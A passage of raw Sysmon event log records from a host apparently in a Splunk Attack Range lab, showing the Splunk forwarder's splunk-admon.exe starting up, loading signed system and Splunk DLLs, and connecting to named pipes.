Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001531292Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.161{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001531291Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.161{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001531290Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001531289Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001531288Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001531287Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x80000000000000001531286Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001531285Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x80000000000000001531284Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001531283Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001531282Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001531281Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001531280Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001531279Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001531278Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001531277Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001531276Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001531275Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001531274Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001531273Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001531272Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.030{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001531271Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001531270Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001531269Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001531268Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001531267Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001531266Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001531265Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001531264Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001531263Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001531262Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001531261Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001531260Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001531259Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001531258Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001531257Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001531256Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001531255Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001531254Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001531253Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000001531252Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001531251Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001531250Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001531249Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001531248Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8trueSplunk, Inc.Valid 10341000x80000000000000001531247Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-83AC-607D-0500-00000000BB01}412528C:\Windows\system32\csrss.exe{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001531246Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.014{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001531245Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:34.008{21761711-613A-6080-C45D-00000000BB01}6208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001531244Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:34.007{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531243Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:34.007{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531242Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:34.007{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531241Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:34.007{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 